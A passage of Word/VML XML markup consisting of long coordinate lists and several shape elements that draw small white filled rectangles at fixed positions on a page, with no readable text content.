142,2734,5142,2736,5142,2738,5142,2740,5142,2741,5142,2743,5142,2745,5142,2747,5142,2749,5142,2752,5142,2754,5142,2756,5142,2758,5142,2760,5142,2763,5142,2765,5142,2768,5142,2770,5142,2773,5142,2775,5142,2778,5142,2780,5142,2783,5142,2786,5142,2789,5142,2792,5142,2794,5142,2797,5142,2800,5142,2800,5142,2800,5142,2800,5142,2800,5142,2800,5142,2800,5142,2800,5142,2800,5142,2800,5142,2800,5142,2800,5142,2800,5142,2800,5142,2800,5142,2800,5142,2800,5142,2800,5142,2800,5142,2800,5142,2800,5143,2800,5143,2800,5143,2800,5143,2800,5143,2800,5144,2800,5144,2800,5144,2800,5145,2800,5145,2800,5145,2800,5146,2800,5146,2800,5147,2800,5147,2800,5148,2800,5148,2800,5149,2800,5149,2800,5150,2800,5151,2800,5151,2800,5152,2800,5153,2800,5154,2800,5154,2800,5155,2800,5156,2800,5157,2800,5158,2800,5159,2800,5161,2800,5162,2800,5163,2800,5164,2800,5165,2800,5167,2800,5168,2800,5170,2800,5171,2800,5173,2800,5174,2800,5176,2800,5178,2800,5179,2800,5181,2800,5183,2800,5185,2800,5187,2800,5189,2800,5191,2800,5194,2800,5196,2800,5198,2800,5200,2800,5203,2800,5205,2800,5208,2800,5211,2800,5213,2800,5216,2800,5219,2800,5222,2800,5225,2800,5228,2800,5231,2800,5235,2800,5238,2800,5241,2800,5245,2800,5248,2800,5252,2800,5256,2800,5259,2800,5263,2800,5267,2800,5271,2800,5276,2800,5280,2800,5284,2800,5288,2800,5293,2800,5298,2800,5302,2800,5307,2800,5312,2800,5317,2800,5322,2800,5327,2800,5332,2800,5338,2800,5343,2800,5349,2800,5354,2800,5360,2800,5366,2800,5372,2800,5378,2800,5384,2800,5390,2800,5397,2800,5397,2800,5397,2800,5397,2800,5397,2800,5397,2800,5397,2800,5397,2800,5397,2800,5397,2800,5397,2800,5397,2800,5397,2800,5397,2800,5397,2800,5397,2800,5397,2800,5397,2800,5397,2800,5397,2800,5397,2800,5397,2800,5397,2800,5397,2800,5397,2799,5397,2799,5397,2799,5397,2799,5397,2799,5397,2799,5397,2798,5397,2798,5397,2798,5397,2798,5397,2798,5397,2797,5397,2797,5397,2797,5397,2797,5397,2796,5397,2796,5397,2795,5397,2795,5397,2795,5397,2794,5397,2794,5397,2793,5397,2793,5397,2793,5397,2792,5397,2792,5397,2791,5397,2790,5397,2790,5397,2789,5397,2789,5397,2788,5397,2787,5397,2787,5397,2786,5397,2785,5397,2784,5397,2783,5397,2783,5397,2782,5397,2781,5397,2780,5397,2779,5397,2778,5397,2777,5397,2776,5397,2775,5397,2774,5397,2773,5397,2772,5397,2770,5397,2769,5397,2768,5397,2767,5397,2765,5397,2764,5397,2763,5397,2761,5397,2760,5397,2758,5397,2757,5397,2755,5397,2753,5397,2752,5397,2750,5397,2748,5397,2747,5397,2745,5397,2743,5397,2741,5397,2739,5397,2737,5397,2735,5397,2733,5397,2731,5397,2729,5397,2727,5397,2725,5397,2723,5397,2720,5397,2718,5397,2716,5397,2713,5397,2711,5397,2708,5397,2706,5397,2703,5397,2700,5397,2698,5397,2695,5397,2692,5397,2689,5397,2686,5397,2683,5397,2680,5397,2680,5397,2680,5397,2680,5397,2680,5397,2680,5397,2680,5397,2680,5397,2680,5397,2680,5397,2680,5397,2680,5397,2680,5397,2680,5396,2680,5396,2680,5396,2680,5396,2680,5396,2680,5396,2680,5396,2680,5396,2680,5396,2680,5395,2680,5395,2680,5395,2680,5395,2680,5394,2680,5394,2680,5394,2680,5393,2680,5393,2680,5393,2680,5392,2680,5392,2680,5391,2680,5391,2680,5390,2680,5390,2680,5389,2680,5388,2680,5388,2680,5387,2680,5386,2680,5386,2680,5385,2680,5384,2680,5383,2680,5382,2680,5381,2680,5380,2680,5379,2680,5378,2680,5377,2680,5375,2680,5374,2680,5373,2680,5372,2680,5370,2680,5369,2680,5367,2680,5366,2680,5364,2680,5362,2680,5361,2680,5359,2680,5357,2680,5355,2680,5353,2680,5351,2680,5349,2680,5347,2680,5345,2680,5343,2680,5340,2680,5338,2680,5335,2680,5333,2680,5330,2680,5328,2680,5325,2680,5322,2680,5319,2680,5316,2680,5313,2680,5310,2680,5307,2680,5304,2680,5300,2680,5297,2680,5294,2680,5290,2680,5286,2680,5283,2680,5279,2680,5275,2680,5271,2680,5267,2680,5263,2680,5259,2680,5254,2680,5250,2680,5245,2680,5241,2680,5236,2680,5231,2680,5226,2680,5221,2680,5216,2680,5211,2680,5206,2680,5201,2680,5195,2680,5190,2680,5184,2680,5178,2680,5172,2680,5166,2680,5160,2680,5154,2680,5148,2680,5142e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:133.500pt;margin-top:288.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2670,5770" coordsize="130,270">
        <v:shape style="position:absolute;left:2670;top:5770;width:130;height:270" coordorigin="2670,5770" coordsize="130,270" path="m2680,5787l2680,5787,2680,5787,2680,5787,2680,5787,2680,5787,2680,5787,2680,5787,2680,5787,2680,5787,2680,5787,2680,5787,2680,5787,2680,5787,2681,5787,2681,5787,2681,5787,2681,5787,2681,5787,2681,5787,2681,5787,2681,5787,2681,5787,2681,5787,2681,5787,2681,5787,2681,5787,2682,5787,2682,5787,2682,5787,2682,5787,2682,5787,2682,5787,2683,5787,2683,5787,2683,5787,2683,5787,2684,5787,2684,5787,2684,5787,2685,5787,2685,5787,2685,5787,2686,5787,2686,5787,2686,5787,2687,5787,2687,5787,2688,5787,2688,5787,2689,5787,2689,5787,2690,5787,2690,5787,2691,5787,2692,5787,2692,5787,2693,5787,2694,5787,2694,5787,2695,5787,2696,5787,2697,5787,2697,5787,2698,5787,2699,5787,2700,5787,2701,5787,2702,5787,2703,5787,2704,5787,2705,5787,2706,5787,2707,5787,2708,5787,2709,5787,2710,5787,2712,5787,2713,5787,2714,5787,2715,5787,2717,5787,2718,5787,2720,5787,2721,5787,2723,5787,2724,5787,2726,5787,2727,5787,2729,5787,2731,5787,2732,5787,2734,5787,2736,5787,2738,5787,2740,5787,2741,5787,2743,5787,2745,5787,2747,5787,2749,5787,2752,5787,2754,5787,2756,5787,2758,5787,2760,5787,2763,5787,2765,5787,2768,5787,2770,5787,2773,5787,2775,5787,2778,5787,2780,5787,2783,5787,2786,5787,2789,5787,2792,5787,2794,5787,2797,5787,2800,5787,2800,5787,2800,5787,2800,5787,2800,5787,2800,5787,2800,5787,2800,5787,2800,5787,2800,5787,2800,5787,2800,5787,2800,5787,2800,5787,2800,5787,2800,5787,2800,5787,2800,5788,2800,5788,2800,5788,2800,5788,2800,5788,2800,5788,2800,5789,2800,5789,2800,5789,2800,5789,2800,5790,2800,5790,2800,5790,2800,5791,2800,5791,2800,5791,2800,5792,2800,5792,2800,5793,2800,5793,2800,5794,2800,5795,2800,5795,2800,5796,2800,5797,2800,5797,2800,5798,2800,5799,2800,5800,2800,5801,2800,5802,2800,5803,2800,5804,2800,5805,2800,5806,2800,5807,2800,5808,2800,5809,2800,5811,2800,5812,2800,5814,2800,5815,2800,5816,2800,5818,2800,5820,2800,5821,2800,5823,2800,5825,2800,5827,2800,5828,2800,5830,2800,5832,2800,5835,2800,5837,2800,5839,2800,5841,2800,5843,2800,5846,2800,5848,2800,5851,2800,5853,2800,5856,2800,5859,2800,5862,2800,5864,2800,5867,2800,5870,2800,5873,2800,5877,2800,5880,2800,5883,2800,5887,2800,5890,2800,5894,2800,5897,2800,5901,2800,5905,2800,5909,2800,5913,2800,5917,2800,5921,2800,5925,2800,5929,2800,5934,2800,5938,2800,5943,2800,5948,2800,5952,2800,5957,2800,5962,2800,5967,2800,5972,2800,5978,2800,5983,2800,5988,2800,5994,2800,6000,2800,6005,2800,6011,2800,6017,2800,6023,2800,6029,2800,6036,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2799,6042,2799,6042,2799,6042,2799,6042,2799,6042,2799,6042,2798,6042,2798,6042,2798,6042,2798,6042,2798,6042,2797,6042,2797,6042,2797,6042,2797,6042,2796,6042,2796,6042,2795,6042,2795,6042,2795,6042,2794,6042,2794,6042,2793,6042,2793,6042,2793,6042,2792,6042,2792,6042,2791,6042,2790,6042,2790,6042,2789,6042,2789,6042,2788,6042,2787,6042,2787,6042,2786,6042,2785,6042,2784,6042,2783,6042,2783,6042,2782,6042,2781,6042,2780,6042,2779,6042,2778,6042,2777,6042,2776,6042,2775,6042,2774,6042,2773,6042,2772,6042,2770,6042,2769,6042,2768,6042,2767,6042,2765,6042,2764,6042,2763,6042,2761,6042,2760,6042,2758,6042,2757,6042,2755,6042,2753,6042,2752,6042,2750,6042,2748,6042,2747,6042,2745,6042,2743,6042,2741,6042,2739,6042,2737,6042,2735,6042,2733,6042,2731,6042,2729,6042,2727,6042,2725,6042,2723,6042,2720,6042,2718,6042,2716,6042,2713,6042,2711,6042,2708,6042,2706,6042,2703,6042,2700,6042,2698,6042,2695,6042,2692,6042,2689,6042,2686,6042,2683,6042,2680,6042,2680,6042,2680,6042,2680,6042,2680,6042,2680,6042,2680,6042,2680,6042,2680,6042,2680,6042,2680,6042,2680,6042,2680,6042,2680,6042,2680,6042,2680,6042,2680,6042,2680,6041,2680,6041,2680,6041,2680,6041,2680,6041,2680,6041,2680,6040,2680,6040,2680,6040,2680,6040,2680,6039,2680,6039,2680,6039,2680,6038,2680,6038,2680,6038,2680,6037,2680,6037,2680,6036,2680,6036,2680,6035,2680,6034,2680,6034,2680,6033,2680,6032,2680,6032,2680,6031,2680,6030,2680,6029,2680,6028,2680,6027,2680,6026,2680,6025,2680,6024,2680,6023,2680,6022,2680,6021,2680,6020,2680,6018,2680,6017,2680,6015,2680,6014,2680,6013,2680,6011,2680,6009,2680,6008,2680,6006,2680,6004,2680,6002,2680,6000,2680,5999,2680,5997,2680,5994,2680,5992,2680,5990,2680,5988,2680,5986,2680,5983,2680,5981,2680,5978,2680,5976,2680,5973,2680,5970,2680,5967,2680,5965,2680,5962,2680,5959,2680,5955,2680,5952,2680,5949,2680,5946,2680,5942,2680,5939,2680,5935,2680,5932,2680,5928,2680,5924,2680,5920,2680,5916,2680,5912,2680,5908,2680,5904,2680,5900,2680,5895,2680,5891,2680,5886,2680,5881,2680,5877,2680,5872,2680,5867,2680,5862,2680,5857,2680,5851,2680,5846,2680,5841,2680,5835,2680,5829,2680,5824,2680,5818,2680,5812,2680,5806,2680,5800,2680,5793,2680,5787e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:133.500pt;margin-top:319.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2670,6390" coordsize="130,270">
        <v:shape style="position:absolute;left:2670;top:6390;width:130;height:270" coordorigin="2670,6390" coordsize="130,270" path="m2680,6417l2680,6417,2680,6417,2680,6417,2680,6417,2680,6417,2680,6417,2680,6417,2680,6417,2680,6417,2680,6417,2680,6417,2680,6417,2680,6417,2681,6417,2681,6417,2681,6417,2681,6417,2681,6417,2681,6417,2681,6417,2681,6417,2681,6417,2681,6417,2681,6417,2681,6417,2681,6417,2682,6417,2682,6417,2682,6417,2682,6417,2682,6417,2682,6417,2683,6417,2683,6417,2683,6417,2683,6417,2684,6417,2684,6417,2684,6417,2685,6417,2685,6417,2685,6417,2686,6417,2686,6417,2686,6417,2687,6417,2687,6417,2688,6417,2688,6417,2689,6417,2689,6417,2690,6417,2690,6417,2691,6417,2692,6417,2692,6417,2693,6417,2694,6417,2694,6417,2695,6417,2696,6417,2697,6417,2697,6417,2698,6417,2699,6417,2700,6417,2701,6417,2702,6417,2703,6417,2704,6417,2705,6417,2706,6417,2707,6417,2708,6417,2709,6417,2710,6417,2712,6417,2713,6417,2714,6417,2715,6417,2717,6417,2718,6417,2720,6417,2721,6417,2723,6417,2724,6417,2726,6417,2727,6417,2729,6417,2731,6417,2732,6417,2734,6417,2736,6417,2738,6417,2740,6417,2741,6417,2743,6417,2745,6417,2747,6417,2749,6417,2752,6417,2754,6417,2756,6417,2758,6417,2760,6417,2763,6417,2765,6417,2768,6417,2770,6417,2773,6417,2775,6417,2778,6417,2780,6417,2783,6417,2786,6417,2789,6417,2792,6417,2794,6417,2797,6417,2800,6417,2800,6417,2800,6417,2800,6417,2800,6417,2800,6417,2800,6417,2800,6417,2800,6417,2800,6417,2800,6417,2800,6417,2800,6417,2800,6417,2800,6418,2800,6418,2800,6418,2800,6418,2800,6418,2800,6418,2800,6418,2800,6418,2800,6419,2800,6419,2800,6419,2800,6419,2800,6420,2800,6420,2800,6420,2800,6421,2800,6421,2800,6421,2800,6422,2800,6422,2800,6423,2800,6423,2800,6424,2800,6424,2800,6425,2800,6426,2800,6426,2800,6427,2800,6428,2800,6428,2800,6429,2800,6430,2800,6431,2800,6432,2800,6433,2800,6434,2800,6435,2800,6436,2800,6437,2800,6439,2800,6440,2800,6441,2800,6442,2800,6444,2800,6445,2800,6447,2800,6448,2800,6450,2800,6452,2800,6453,2800,6455,2800,6457,2800,6459,2800,6461,2800,6463,2800,6465,2800,6467,2800,6469,2800,6471,2800,6474,2800,6476,2800,6479,2800,6481,2800,6484,2800,6486,2800,6489,2800,6492,2800,6495,2800,6498,2800,6501,2800,6504,2800,6507,2800,6510,2800,6514,2800,6517,2800,6520,2800,6524,2800,6528,2800,6531,2800,6535,2800,6539,2800,6543,2800,6547,2800,6551,2800,6555,2800,6560,2800,6564,2800,6569,2800,6573,2800,6578,2800,6583,2800,6588,2800,6592,2800,6598,2800,6603,2800,6608,2800,6613,2800,6619,2800,6624,2800,6630,2800,6636,2800,6642,2800,6647,2800,6654,2800,6660,2800,6666,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2799,6672,2799,6672,2799,6672,2799,6672,2799,6672,2799,6672,2798,6672,2798,6672,2798,6672,2798,6672,2798,6672,2797,6672,2797,6672,2797,6672,2797,6672,2796,6672,2796,6672,2795,6672,2795,6672,2795,6672,2794,6672,2794,6672,2793,6672,2793,6672,2793,6672,2792,6672,2792,6672,2791,6672,2790,6672,2790,6672,2789,6672,2789,6672,2788,6672,2787,6672,2787,6672,2786,6672,2785,6672,2784,6672,2783,6672,2783,6672,2782,6672,2781,6672,2780,6672,2779,6672,2778,6672,2777,6672,2776,6672,2775,6672,2774,6672,2773,6672,2772,6672,2770,6672,2769,6672,2768,6672,2767,6672,2765,6672,2764,6672,2763,6672,2761,6672,2760,6672,2758,6672,2757,6672,2755,6672,2753,6672,2752,6672,2750,6672,2748,6672,2747,6672,2745,6672,2743,6672,2741,6672,2739,6672,2737,6672,2735,6672,2733,6672,2731,6672,2729,6672,2727,6672,2725,6672,2723,6672,2720,6672,2718,6672,2716,6672,2713,6672,2711,6672,2708,6672,2706,6672,2703,6672,2700,6672,2698,6672,2695,6672,2692,6672,2689,6672,2686,6672,2683,6672,2680,6672,2680,6672,2680,6672,2680,6672,2680,6672,2680,6672,2680,6672,2680,6672,2680,6672,2680,6672,2680,6672,2680,6672,2680,6672,2680,6672,2680,6672,2680,6672,2680,6672,2680,6672,2680,6672,2680,6671,2680,6671,2680,6671,2680,6671,2680,6671,2680,6671,2680,6670,2680,6670,2680,6670,2680,6669,2680,6669,2680,6669,2680,6668,2680,6668,2680,6667,2680,6667,2680,6666,2680,6666,2680,6665,2680,6665,2680,6664,2680,6663,2680,6663,2680,6662,2680,6661,2680,6660,2680,6659,2680,6659,2680,6658,2680,6657,2680,6656,2680,6655,2680,6653,2680,6652,2680,6651,2680,6650,2680,6649,2680,6647,2680,6646,2680,6644,2680,6643,2680,6641,2680,6640,2680,6638,2680,6636,2680,6635,2680,6633,2680,6631,2680,6629,2680,6627,2680,6625,2680,6623,2680,6620,2680,6618,2680,6616,2680,6613,2680,6611,2680,6608,2680,6606,2680,6603,2680,6601,2680,6598,2680,6595,2680,6592,2680,6589,2680,6586,2680,6583,2680,6579,2680,6576,2680,6573,2680,6569,2680,6566,2680,6562,2680,6558,2680,6554,2680,6551,2680,6547,2680,6543,2680,6538,2680,6534,2680,6530,2680,6525,2680,6521,2680,6516,2680,6512,2680,6507,2680,6502,2680,6497,2680,6492,2680,6487,2680,6482,2680,6476,2680,6471,2680,6465,2680,6460,2680,6454,2680,6448,2680,6442,2680,6436,2680,6430,2680,6424,2680,6417e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:133.500pt;margin-top:352.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2670,7050" coordsize="130,250">
        <v:shape style="position:absolute;left:2670;top:7050;width:130;height:250" coordorigin="2670,7050" coordsize="130,250" path="m2680,7063l2680,7063,2680,7063,2680,7063,2680,7063,2680,7063,2680,7063,2680,7063,2680,7063,2680,7063,2680,7063,2680,7063,2680,7063,2680,7063,2681,7063,2681,7063,2681,7063,2681,7063,2681,7063,2681,7063,2681,7063,2681,7063,2681,7063,2681,7063,2681,7063,2681,7063,2681,7063,2682,7063,2682,7063,2682,7063,2682,7063,2682,7063,2682,7063,2683,7063,2683,7063,2683,7063,2683,7063,2684,7063,2684,7063,2684,7063,2685,7063,2685,7063,2685,7063,2686,7063,2686,7063,2686,7063,2687,7063,2687,7063,2688,7063,2688,7063,2689,7063,2689,7063,2690,7063,2690,7063,2691,7063,2692,7063,2692,7063,2693,7063,2694,7063,2694,7063,2695,7063,2696,7063,2697,7063,2697,7063,2698,7063,2699,7063,2700,7063,2701,7063,2702,7063,2703,7063,2704,7063,2705,7063,2706,7063,2707,7063,2708,7063,2709,7063,2710,7063,2712,7063,2713,7063,2714,7063,2715,7063,2717,7063,2718,7063,2720,7063,2721,7063,2723,7063,2724,7063,2726,7063,2727,7063,2729,7063,2731,7063,2732,7063,2734,7063,2736,7063,2738,7063,2740,7063,2741,7063,2743,7063,2745,7063,2747,7063,2749,7063,2752,7063,2754,7063,2756,7063,2758,7063,2760,7063,2763,7063,2765,7063,2768,7063,2770,7063,2773,7063,2775,7063,2778,7063,2780,7063,2783,7063,2786,7063,2789,7063,2792,7063,2794,7063,2797,7063,2800,7063,2800,7063,2800,7063,2800,7063,2800,7063,2800,7063,2800,7063,2800,7063,2800,7063,2800,7063,2800,7063,2800,7063,2800,7063,2800,7063,2800,7063,2800,7063,2800,7063,2800,7063,2800,7063,2800,7063,2800,7064,2800,7064,2800,7064,2800,7064,2800,7064,2800,7065,2800,7065,2800,7065,2800,7066,2800,7066,2800,7066,2800,7067,2800,7067,2800,7068,2800,7068,2800,7069,2800,7069,2800,7070,2800,7070,2800,7071,2800,7072,2800,7072,2800,7073,2800,7074,2800,7075,2800,7075,2800,7076,2800,7077,2800,7078,2800,7079,2800,7080,2800,7081,2800,7083,2800,7084,2800,7085,2800,7086,2800,7088,2800,7089,2800,7091,2800,7092,2800,7094,2800,7095,2800,7097,2800,7099,2800,7100,2800,7102,2800,7104,2800,7106,2800,7108,2800,7110,2800,7112,2800,7114,2800,7117,2800,7119,2800,7121,2800,7124,2800,7126,2800,7129,2800,7132,2800,7134,2800,7137,2800,7140,2800,7143,2800,7146,2800,7149,2800,7152,2800,7156,2800,7159,2800,7162,2800,7166,2800,7169,2800,7173,2800,7177,2800,7180,2800,7184,2800,7188,2800,7192,2800,7197,2800,7201,2800,7205,2800,7209,2800,7214,2800,7219,2800,7223,2800,7228,2800,7233,2800,7238,2800,7243,2800,7248,2800,7253,2800,7259,2800,7264,2800,7270,2800,7275,2800,7281,2800,7287,2800,7293,2800,7299,2800,7305,2800,7311,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2799,7318,2799,7318,2799,7318,2799,7318,2799,7318,2799,7318,2798,7318,2798,7318,2798,7318,2798,7318,2798,7318,2797,7318,2797,7318,2797,7318,2797,7318,2796,7318,2796,7318,2795,7318,2795,7318,2795,7318,2794,7318,2794,7318,2793,7318,2793,7318,2793,7318,2792,7318,2792,7318,2791,7318,2790,7318,2790,7318,2789,7318,2789,7318,2788,7318,2787,7318,2787,7318,2786,7318,2785,7318,2784,7318,2783,7318,2783,7318,2782,7318,2781,7318,2780,7318,2779,7318,2778,7318,2777,7318,2776,7318,2775,7318,2774,7318,2773,7318,2772,7318,2770,7318,2769,7318,2768,7318,2767,7318,2765,7318,2764,7318,2763,7318,2761,7318,2760,7318,2758,7318,2757,7318,2755,7318,2753,7318,2752,7318,2750,7318,2748,7318,2747,7318,2745,7318,2743,7318,2741,7318,2739,7318,2737,7318,2735,7318,2733,7318,2731,7318,2729,7318,2727,7318,2725,7318,2723,7318,2720,7318,2718,7318,2716,7318,2713,7318,2711,7318,2708,7318,2706,7318,2703,7318,2700,7318,2698,7318,2695,7318,2692,7318,2689,7318,2686,7318,2683,7318,2680,7318,2680,7318,2680,7318,2680,7318,2680,7318,2680,7318,2680,7318,2680,7318,2680,7318,2680,7318,2680,7318,2680,7318,2680,7317,2680,7317,2680,7317,2680,7317,2680,7317,2680,7317,2680,7317,2680,7317,2680,7317,2680,7316,2680,7316,2680,7316,2680,7316,2680,7316,2680,7315,2680,7315,2680,7315,2680,7314,2680,7314,2680,7314,2680,7313,2680,7313,2680,7312,2680,7312,2680,7311,2680,7311,2680,7310,2680,7309,2680,7309,2680,7308,2680,7307,2680,7306,2680,7306,2680,7305,2680,7304,2680,7303,2680,7302,2680,7301,2680,7300,2680,7299,2680,7298,2680,7296,2680,7295,2680,7294,2680,7292,2680,7291,2680,7290,2680,7288,2680,7287,2680,7285,2680,7283,2680,7282,2680,7280,2680,7278,2680,7276,2680,7274,2680,7272,2680,7270,2680,7268,2680,7266,2680,7263,2680,7261,2680,7259,2680,7256,2680,7254,2680,7251,2680,7249,2680,7246,2680,7243,2680,7240,2680,7237,2680,7234,2680,7231,2680,7228,2680,7225,2680,7221,2680,7218,2680,7215,2680,7211,2680,7207,2680,7204,2680,7200,2680,7196,2680,7192,2680,7188,2680,7184,2680,7180,2680,7175,2680,7171,2680,7166,2680,7162,2680,7157,2680,7152,2680,7147,2680,7142,2680,7137,2680,7132,2680,7127,2680,7122,2680,7116,2680,7111,2680,7105,2680,7099,2680,7093,2680,7087,2680,7081,2680,7075,2680,7069,2680,7063e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:133.500pt;margin-top:383.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2670,7670" coordsize="130,270">
        <v:shape style="position:absolute;left:2670;top:7670;width:130;height:270" coordorigin="2670,7670" coordsize="130,270" path="m2680,7693l2680,7693,2680,7693,2680,7693,2680,7693,2680,7693,2680,7693,2680,7693,2680,7693,2680,7693,2680,7693,2680,7693,2680,7693,2680,7693,2681,7693,2681,7693,2681,7693,2681,7693,2681,7693,2681,7693,2681,7693,2681,7693,2681,7693,2681,7693,2681,7693,2681,7693,2681,7693,2682,7693,2682,7693,2682,7693,2682,7693,2682,7693,2682,7693,2683,7693,2683,7693,2683,7693,2683,7693,2684,7693,2684,7693,2684,7693,2685,7693,2685,7693,2685,7693,2686,7693,2686,7693,2686,7693,2687,7693,2687,7693,2688,7693,2688,7693,2689,7693,2689,7693,2690,7693,2690,7693,2691,7693,2692,7693,2692,7693,2693,7693,2694,7693,2694,7693,2695,7693,2696,7693,2697,7693,2697,7693,2698,7693,2699,7693,2700,7693,2701,7693,2702,7693,2703,7693,2704,7693,2705,7693,2706,7693,2707,7693,2708,7693,2709,7693,2710,7693,2712,7693,2713,7693,2714,7693,2715,7693,2717,7693,2718,7693,2720,7693,2721,7693,2723,7693,2724,7693,2726,7693,2727,7693,2729,7693,2731,7693,2732,7693,2734,7693,2736,7693,2738,7693,2740,7693,2741,7693,2743,7693,2745,7693,2747,7693,2749,7693,2752,7693,2754,7693,2756,7693,2758,7693,2760,7693,2763,7693,2765,7693,2768,7693,2770,7693,2773,7693,2775,7693,2778,7693,2780,7693,2783,7693,2786,7693,2789,7693,2792,7693,2794,7693,2797,7693,2800,7693,2800,7693,2800,7693,2800,7693,2800,7693,2800,7693,2800,7693,2800,7693,2800,7693,2800,7693,2800,7693,2800,7693,2800,7693,2800,7693,2800,7693,2800,7693,2800,7693,2800,7693,2800,7694,2800,7694,2800,7694,2800,7694,2800,7694,2800,7694,2800,7695,2800,7695,2800,7695,2800,7696,2800,7696,2800,7696,2800,7697,2800,7697,2800,7697,2800,7698,2800,7698,2800,7699,2800,7699,2800,7700,2800,7701,2800,7701,2800,7702,2800,7703,2800,7703,2800,7704,2800,7705,2800,7706,2800,7707,2800,7708,2800,7709,2800,7710,2800,7711,2800,7712,2800,7713,2800,7714,2800,7715,2800,7717,2800,7718,2800,7719,2800,7721,2800,7722,2800,7724,2800,7726,2800,7727,2800,7729,2800,7731,2800,7733,2800,7734,2800,7736,2800,7738,2800,7740,2800,7743,2800,7745,2800,7747,2800,7749,2800,7752,2800,7754,2800,7757,2800,7759,2800,7762,2800,7765,2800,7768,2800,7770,2800,7773,2800,7776,2800,7779,2800,7783,2800,7786,2800,7789,2800,7793,2800,7796,2800,7800,2800,7803,2800,7807,2800,7811,2800,7815,2800,7819,2800,7823,2800,7827,2800,7831,2800,7835,2800,7840,2800,7844,2800,7849,2800,7854,2800,7858,2800,7863,2800,7868,2800,7873,2800,7878,2800,7884,2800,7889,2800,7894,2800,7900,2800,7906,2800,7911,2800,7917,2800,7923,2800,7929,2800,7935,2800,7942,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2799,7948,2799,7948,2799,7948,2799,7948,2799,7948,2799,7948,2798,7948,2798,7948,2798,7948,2798,7948,2798,7948,2797,7948,2797,7948,2797,7948,2797,7948,2796,7948,2796,7948,2795,7948,2795,7948,2795,7948,2794,7948,2794,7948,2793,7948,2793,7948,2793,7948,2792,7948,2792,7948,2791,7948,2790,7948,2790,7948,2789,7948,2789,7948,2788,7948,2787,7948,2787,7948,2786,7948,2785,7948,2784,7948,2783,7948,2783,7948,2782,7948,2781,7948,2780,7948,2779,7948,2778,7948,2777,7948,2776,7948,2775,7948,2774,7948,2773,7948,2772,7948,2770,7948,2769,7948,2768,7948,2767,7948,2765,7948,2764,7948,2763,7948,2761,7948,2760,7948,2758,7948,2757,7948,2755,7948,2753,7948,2752,7948,2750,7948,2748,7948,2747,7948,2745,7948,2743,7948,2741,7948,2739,7948,2737,7948,2735,7948,2733,7948,2731,7948,2729,7948,2727,7948,2725,7948,2723,7948,2720,7948,2718,7948,2716,7948,2713,7948,2711,7948,2708,7948,2706,7948,2703,7948,2700,7948,2698,7948,2695,7948,2692,7948,2689,7948,2686,7948,2683,7948,2680,7948,2680,7948,2680,7948,2680,7948,2680,7948,2680,7948,2680,7948,2680,7948,2680,7948,2680,7948,2680,7948,2680,7948,2680,7948,2680,7948,2680,7948,2680,7948,2680,7947,2680,7947,2680,7947,2680,7947,2680,7947,2680,7947,2680,7947,2680,7946,2680,7946,2680,7946,2680,7946,2680,7945,2680,7945,2680,7945,2680,7944,2680,7944,2680,7943,2680,7943,2680,7943,2680,7942,2680,7942,2680,7941,2680,7940,2680,7940,2680,7939,2680,7938,2680,7938,2680,7937,2680,7936,2680,7935,2680,7934,2680,7933,2680,7932,2680,7931,2680,7930,2680,7929,2680,7928,2680,7927,2680,7925,2680,7924,2680,7923,2680,7921,2680,7920,2680,7918,2680,7917,2680,7915,2680,7914,2680,7912,2680,7910,2680,7908,2680,7906,2680,7904,2680,7902,2680,7900,2680,7898,2680,7896,2680,7894,2680,7891,2680,7889,2680,7887,2680,7884,2680,7882,2680,7879,2680,7876,2680,7873,2680,7870,2680,7868,2680,7865,2680,7861,2680,7858,2680,7855,2680,7852,2680,7848,2680,7845,2680,7841,2680,7838,2680,7834,2680,7830,2680,7826,2680,7822,2680,7818,2680,7814,2680,7810,2680,7806,2680,7801,2680,7797,2680,7792,2680,7787,2680,7783,2680,7778,2680,7773,2680,7768,2680,7763,2680,7757,2680,7752,2680,7746,2680,7741,2680,7735,2680,7730,2680,7724,2680,7718,2680,7712,2680,7706,2680,7699,2680,7693e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:133.500pt;margin-top:415.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2670,8310" coordsize="130,270">
